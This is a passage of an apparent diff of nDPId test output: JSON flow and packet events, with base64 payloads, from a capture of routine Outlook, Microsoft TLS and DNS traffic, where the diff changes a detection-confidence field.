2zk99ErenQrEGfd6PyJWO5iWwsY0xU8meKY2Jp0LdAk9BxGhy3LU4uTxR4t614VXg7Le3F2XXuKmjbJsQgbVMUYhVkJ6JBcddg15aCLR+YYoWrYgjp+WThS8gLNpJaxaihLqA77pNdcaI187nN+luEpN2fsVBRr1v588oPOg6ugZIMvvQGM\/932ci9FWgh+Egtrp9jWvgwN6C+x\/6Ul9gPKwr35MQ2L88mYUnXuuDGVnTkJ6VTWgAawJ1AxcwiThWo3unPbjvr6pM+jswTV6XOO7V8+41tsMKM1s8WPQI+YtWq8fuv3wgnLtmndqFCNp"} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC0AbvnBlzSyo5yyVAQEADxegAAFwMDCRUAAAAAAAAA26eDpJKN0BUxQmpzIi5g3ucuMMDrMgecHX\/CXiINnB6nf8RfrEh6QYh8SapIE51Wk64JXAUrOVrpUS79nUGqzqypD0Bb3GpnKslW+hVNJEAhzXjXlIms0Mdvn6rZf1ZDryhGsMaJdsIsDeqTE7cSjb\/AwDHg30Dyx\/033m2orYnQp+ZJ5N9NWzfNjr1H+vEJ2aGglmYbAeu\/eTtxNNfcP8qqdaUykL6lGIGhgLgYGMo5CMVqPKpBBKbvbUNBzJadRi9LHo18AgSCwBMZ6bHVYJDpuFL7e4MT+bXzL18TYFQOTCQfRi5j7DT1as0nLD6cQ0jKomb4NNz1M1ClcV55CitfGm0nMZU3GHOq9xlAFFOdfaUNUR+\/9UjqZ44ylRWAqJ6YHxWCQdtqMTvizXKZS4+o82xV4TJVbLkhSRuiz2uTEwwVxekQB2DDmh3GiR9Ye6GPUgczN\/oCVDwpIkKENeQcP\/6Pokh8HMAvZ2RSwo+VUg00wRguVh\/w3achjv22jf5I9GRZwEow5WUpfCf8lVnHG9wLFCzsLG1I8WMaT0TDTKmn7QoYLtSk2V04tAybQOMHVVI0hNhlfUXhSh+SCshPM17AY0UkKtRYcOa2eStGarsU2t5cfO840a2F+oCsIGDj3tvdR13INFmb7pHkKy+Q2V+4uyAMl+Ox8g+B18vuMUBFtZgxt4DO0uuOzFmplvXLtxD3fbrKuxl\/6k\/eCJsGdMUgzkQC\/tUwe4V3D4jZHwwQSFFI+17aKc3J7x1BEo6ekzNTJS1+B4LNLTfv+T0lK8gzRlr5u7\/zaM8tfLPPN37K2o1mRMRjA5iIukpvT8U5wOf5x\/TVVVdMA8FAaqdY6hLNRSvAFVtu5XaBHOcfP3sb1XSB1z4GRcUCgiJxv+lQFekTDU9BS5oGQCQcC+WphKRrfjCRy8ZZhWK9J\/fFGeUgxNdNGEWCyhtCDvzCtVbUxSi2WZ66rDdU3aSKcEOMnDfpPuQ3aNkoqkdkwbdMewaWAPifWpjrrxg90ieLTE7FgbcxFjvhr5lFLSoRBF\/iPJs6lHTLDkWB5y15f1r\/8ZLDb4IhW9FIX\/CLiZ6rpS0mHTHUE9vn\/9hAsmx46xOm3J34VvMgqFYNluvzn3dUGnNnv4rW9ETLU5nx9MjAInMLEQZjDDkNtlaMy4FrKcYLZYQdYzERpfoBvKuaTJfKsWfO7jgAn1v6gbrSWphH3cXzQjxw802J0V4QeazmBVGA0E6lG79pCNEO0uh2dgwktSmtwiCBclBc5tjf6nl4O1l4nqizShQRxCCIPprqlc5ewvpot0KzGllydHXYVwvl3NqOGVnDVbcYW6rsr9cNQcgn1WFKVBGaaHM+XgnvZNhqKSKSS\/JwnHZ96JaxzHCfl4G5C2cceJe1cA34Dat1FKEtweJ9xvHyrHpcm5q9Vkp7cv2o7Ygb+hipT+4C1cSkXBVesDC0+tvSXpCsG73FkouarVtpL+0PQKkzA
R1yJgDVrUYv9JCem0QTLOVmTHZ+lN3HGmtyIJYoBu1J4ll241iHn4yj6vQ701Nb8mVXZ6EpF\/5V+Ojw4OShpQ9K4JNfmRah1H4u1+tm5sdLnJXJCnxd1z1bP35y0tiPSMOaFD7D36ftgNesfeblmbdO3QvYo5sZjH2g\/rkgDvWctEdVPFefeneKNa6YJtDm2B1tmPiPBA9Oq0w39UHoupp7PhIxW8KMg8k6pOGMjzQ6Lk23qZ2phXBaaIaaOL394fc7c7DxLl8DqdGBlLveqkkwCREFnxvKjAePN1cC1XOtq0lnaYt1kQ27UguJ0fER9DAfYowgtFCNAKFVeNA3gSi1AQ+OtFaANU7+ThFzU9jKVufQm+9414vvr6INHdHhMJCKTXzk4z8zZd0u+NZ05MVhtrOOr5TlUY0TGx+kJE8="} 01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC0AbvnBmJ6yo5yyVAYEADQ3AAA8smVcb3q7jInDMp6iu2tmr5Z01S6ktfb24g2DVivJvFFx18svOuqK0sgnY23ZGcWDPabxfRHCA4+gQkog41eD9Q+jY8o9PdPxSEJPwKKiq97+swgykYZPYYGmASILHqMJuZfByhEv3xViLnOQSEMlZhcFWZRFTusxMYced9WKWA0fc6Tz6HTt2Slu4vTvwt52pLlywDQ+moDsDqD4uzlqRKVGfUL\/ch1qgzh1ik3fV6dkbtg2JStfj9+0gWhw\/1tpp41Yq3ViTYYlVWsBAlK9383UtTU6832bkiivRikzvg6xlr6cUoD8pfbv255mX4wGzTGlmpvD4zQbPqZWm+dyGHA4KTjyuOM3iUOXvN2EIc4hSFWRtZSWhTg95jPk2WAmsedaTcdmQKZ2viJIrwprKiA8pqElIbad4UayJEEQ2rLEHe+6Rkn7weFiJ9Cf4UMQ6av+K70+Y96itdD4PDv0OKsC6tZfU\/tfc4I3DNLWON4dS6I+6zur216gRLFptPxg8nJaKRiptY9M7sohpWI5akHqMg98N8hf2hc0wH9zfT\/L5fz7Z9CQdyywynd2mPmUEW9OWFeYn4wEC\/gdxA80M9Zzf7uv0KAn+8LelSJkvdI3pBiv4FC333GGWS6fic1Zy4pYfk+L8GFZinANnaiXdJr7xAtMQ1GYOBWAHKoH+GJ8tU2xACRvM36EvIAH0I2RrIzXjHRnEOXkSC+CLSu8xyz6ePYQHWJqTeOV24udwyFiAkzDPh7H2SHxmU7LHZwkam8rX9zgmZLxdYHlhAD2yJRjuwO6msg2yZjsqwSwxdSZJhRunBsHb4p7DEvQLMPjpsbatjtgVN9T+qsCyHCJEkFmMU3QsxkCGtossZlWOQrLODqkaHoKbAV0ZeWnv1dwukSAWvNXFgALrC\/LDs9Yk\/0HHogbwj5gGNEDtJS+nkfi7bA8yoN5eCDO2Vffn4zk+ciDVKaCLhgHHzVMIfIKVrI1fMzRQLNYRDWjxKcqdipYwYp0PAI+b3Yx\/DzTVijfHkaedZRCvCw9VPw+QLgF0VkIyTaHhWJgvUO1Zj1YHqbkkNGKFdwVWPQGrGrq1L
qA0g1BITMzZ35AcyWNuoGr66LZrtpjF+wDWVoz964kvXYU00tfXiJSAYozGe62YqD95apGcA76\/XZl5+SMB+fuqPf"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
02440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2a\/ZF4bv+FAQEAAXNQAAFwMDDxEAAAAAAAAAWp5GeZKPSB7w816DdrEEqHX9aC+YviuGDPWPZX1hWzeJO56tAdFAhHB2CxgaqBUmTp67G7NpRBSOlgFCk7Rz2PSU2RjHkzQN9DEZnqJDnpBJTPsDp7SajTr4PwFG5UIWqi9zReh9EtkjrIng35h3QjPy5pgRGIggIUa\/zHocLpnIHnx2NID0uKUJhEdZqWE4pcslJgdX4YfRKdEPTj3+9rZ3sLr++gXqMzrFGQr9EQgG6\/tRgaivaU0aW0ztmvO3\/qkvcrzeXMhBZCC0bJVz2bEiKKLd+7L5\/eHqmfs1xGLoIVjqoCMrClOzLnCDeSqZPqsY8tiTWubYavu9O8jG+ez+5Hkdw5Zqb5fD9oP0Ibcl2RZkNVM95HmLc4YD76gl\/z1R4Pv\/X+\/YqfzUCuKlbPSA2rgZ1AV5JLooIc7Be\/pYYpsCuIChG0LSB3wA5uDyqmIr57tSP8OI\/758hiFPERZ62qSkcVdehrui9bd5qubE0mTze86LYcawTdiQmMEKmQRBM4+o\/tLRLdTTAHx+8vIwh6AzvixYQvN8Ez8hb+phV92bD5q6hI7M8\/JGEZPjzNU+xKD+ISfZsgEkV2kgA1pedlTeMVuH\/BZclBXFLL5qRfhqeOdjAoZ73FOd8rYWzIde9ssd7E5A+tydX+O9p3kJTnLjhtup7pO1JKqLG8qs7kj4hnoO0t81p9EOSvl36UbBJ\/\/ta9Ym0CAwPBXdG+wAoJE7kndX2G2xUen+Ixk8fIsE2mGGvoV1Us4DqJZlvb5kJ5nWps2iI9sPEuDCreKTajgn6cDATXaCOavuKfFgCBU7JO2xOSJglSq7B7a6Rdhau\/3b0GgchjkVWsL6KTcuabDbsB3hgBi88ZjqfwCY2Nb9XY\/bt2EvOKRb8ymRF+9JboUUDmnm0q\/gX\/KH1nOauqAmFBE3aLfeWKAmW\/ItfqIuivKY+YDdWjc0HTcG1YGSfVrjr6aDU6y2TemMpnTIWRCWpvy7K5WBLe5V6MFlmxWmTIqOmq2cAefJgEppNDtGK3uWqgpEtHWR7rX\/TY7ljVAdLTNKRs1CNLO9YQxubR3nk57cLpnXbrfj+v+Lj4KuWOQnGZWe\/F\/8TM6cKx8vWkZgNLvg7fWbclvvuNbfQRKs6H63c6ZScHSu30WlwdJca10PuaOw6kUS8+8NgGoTM6EEL\/iGpUGKZDRPOSrSaO1EzIgUat4tPz1jNP77yXzl++\/KXlg43EyAlQZOnRr\/NFgfM4gzLfr7lDMDA3E0lRT+v95g78gwDuwXQ7BBPnvAls+NQwZbP7V0m0BvQjEB6p0fzqeSFPDpYbzQ0ZX6GjzMOnlKuf61RRwzVqCy8gfKQUs3skC1gvLgCV41uMUPTEfGnxmlKSMMVedbAmX+sTsKmnVgrA25Xxx44Rnz4aF\/zFkDRBzvExZFLH6OXGMRXTSfsHLF31OKw0QjcHdXKZOHlLQlo\/rph7r52bcX5wKB3t7X
osUhaCCO8kIb3nCkluBB+sXwJFoKumEHcqAVe9Z4M3C6DXD1eVQo5daa5wFvH9M6HZwbTveh7JVbvVN9W+ACJJ82iXxyheKmXUZCNDVrtQaESdZ59LGHrlE2HGCg9gGl6VFzZLygZFAEjriuVbNilai2NxLiYx9gUajnBWGV8FEvryyeJFk\/CE6DTkT5\/Kza\/2Cu73O0Rb9icER0MPyduoWRXyUIUkVQogDMSeWnU3q93wChqd9rGdeB4XXoIzzAE+R\/SRKrrCLHUwPWEq20rYRcseqENqusBQFpiEpsgV0CsZ5TY3+f7Z7A3Y\/FdWIGrpWpaXY666wWyBIvkxWFWygO7Vx3zPMA3tnlzCspk3L3LaW0mn2EnnX30PeY5vR3upafUEAXSo6G6QdKCFC0FARyFx\/T+JPasg5u4ToWCOaORH2gHwo="} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgT+AABAAEAGnGLAqAF5NGKjEtC0AbvnBmXsyo5yyVAYEACH9AAAFwMDBNEAAAAAAAAA3P9mE\/WxzRlzhJVvrME7arSt4cc4b80\/fLZ45lg2jTLN+h8OznVOp0v0YJHlvGb6zo1R0y0127nCMLhWICtDPy2FtY028GLgaBdr\/YLaP88jpPC2wcimHwfty2x4WKI+LPeYoEPRAYicmmTAxPlFzZuaf1iKs+Yu1pMdI4311+rTrqclcjjttiygU+MPtoh4rbcQQi4hllQZ9bpYWoVqJ+iSt2BigYH05vsyHmu879GAhVkohrBF89b4NLKyNAMo0\/QxqgG1rqZTGisx7FjNs8y8uxtw5iKWrSpnhwqsK8HdkzdODGF90yeLdn3CCNJgdm3aNHt1MWZ4JOUy5GzAb47y2cy051il96yYxnPjPoqHZ+sb8GqydD+Wdtw8hwTtkDW7xa7mACJTwuWOIU79l2oDnl63ylL8+JOFMkvCyqpvRSJQTp84k5efBKX3KzQjur4Xu79lO0LFF2NRDD6HkdNIzdZ6GrjQ6cfeKSx84X\/NzyeoBGfExOO\/4zYWpKYV5emN2qK2WwFz9V6yUT4FYCEpMENn4zKRUt2gX3+QJ3UggRDfQ8Atlul6XoqofW\/JfCf+PszhgtXLpc9QxVs3UVfeC+BCBsI\/evJsy+X2zvUBACJp1Cao7EAa\/un53A8cu1w+QQ\/3\/qpgFcwuebDk+bTd2XwEmQcRY5ntXb11cm+t6EgiuWMc8LtkZLW4g6Qk7C3exETENqr8qaKtA57iz69EbEaWfUTp590Cm1yhdVWnzQVccpyZRGULka\/D5PTiR6o3UCqpNAg8I43q9sRPGdaOzmk6LqC8kGMMj1N8P2DVYvcwJb3HB14BO5Blfb4kQNaSZCX81P5eekubMcrCkaYeLnnSigA4c2KBCJI0\/apWCuj0F93qKZChgzKT77EQe9PNeEwH9qa2yEnfxe42M9M\/dR+ZqezhwWXFtPpr0H\/z1rdkNoyBVAssfrasWrQx8flrDgnBIYD1460XCzVYLXxrhZgLoJb3EnAJ7vXCxsY0pXppBEZDDdim91oHmoHdPCYl0He7JYRSbPjtQSoUoTzc
Jp7PxKyOdGVLYBgNJz7zY+ZgHgZgGwjl0V0nqegEjC35a9y8SnKE63ljmDCyN8pWus5ViXGLvQ2Q\/1YgRAjjfufkIFVVjlXa01yHVzB76HDZ1tJk9CCm9ap34gzfAiHToNIXmogCeGqn2CdKyBeaiMSGkpYWcPn2x5217jPoRlFNQrlxxA+bM2VQvFdzsWSjAthvEYT8M0NKxSkvF5fH3eNJZYaUGLIiBrgIGbm4pAM\/x0xPOGKmtUmoLltnDzmkCbUcHYiWy3Y7nJHL865N2SK80a9Zp+7VINzLRf\/Ervx7NR7ytI7hPsERS2gR+t5ngZO4VMBVWlnWrW+Q0k4Q1KqCHh7RRwRxv5sH62zb+RmG6I1XbjkIiH\/fDv5F+LoUplAhBWHtQdc4gcY6R330O9wWahGV3oVm2bRxt8RZJJruLD1DYhwwT99J89GgAfYqHkYbcpYCi6LHqYqrQ6UmOTNERlSpwcXx4Ujj\/ftQuU3MAdSrHpDwvlJG8V3434OyaQQ78dblNHDOqOcIm3UL5vFVeeu11Ar10lwqpNk+NFgn+2DriZe1BIfTkQZAL4Pitnn2QjlLKFQ="} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1626168078676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1626168078676,"pkt":"8BiYFWV8WNVuaKQACABFAACFmUUAAHgR1vEICAgIwKgBeQA1yx4AcZEiotGBgAABAAEAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAABwAwADAABAABT5QAzDGEyLTIyLTMzLTIzNQZkZXBsb3kGc3RhdGljEmFrYW1haXRlY2hub2xvZ2llcwNjb20A"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
+00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079158,"flow_last_seen":1626168079158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079158,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1626168079158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079158,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KaAbvsuitsAAAAALAC\/\/8ZDgAAAgQFtAEDAwYBAQgKPdH+3gAAAAAEAgAA"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079191,"flow_last_seen":1626168079191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079191,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1626168079191,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079191,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KbAbvR3yLxAAAAALAC\/\/88QgAAAgQFtAEDAwYBAQgKPdH+\/wAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1626168079206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079206,"pkt":"8BiYFWV8WNVuaKQACABFAAA0JA1AAG0G9PUocQovwKgBeQG70ppkHrV27LorbYAS\/\/90QAAAAgQFoAEDAwgBAQQC"} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1626168079207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079207,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KaAbvsuittZB61d1AQEACk\/wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 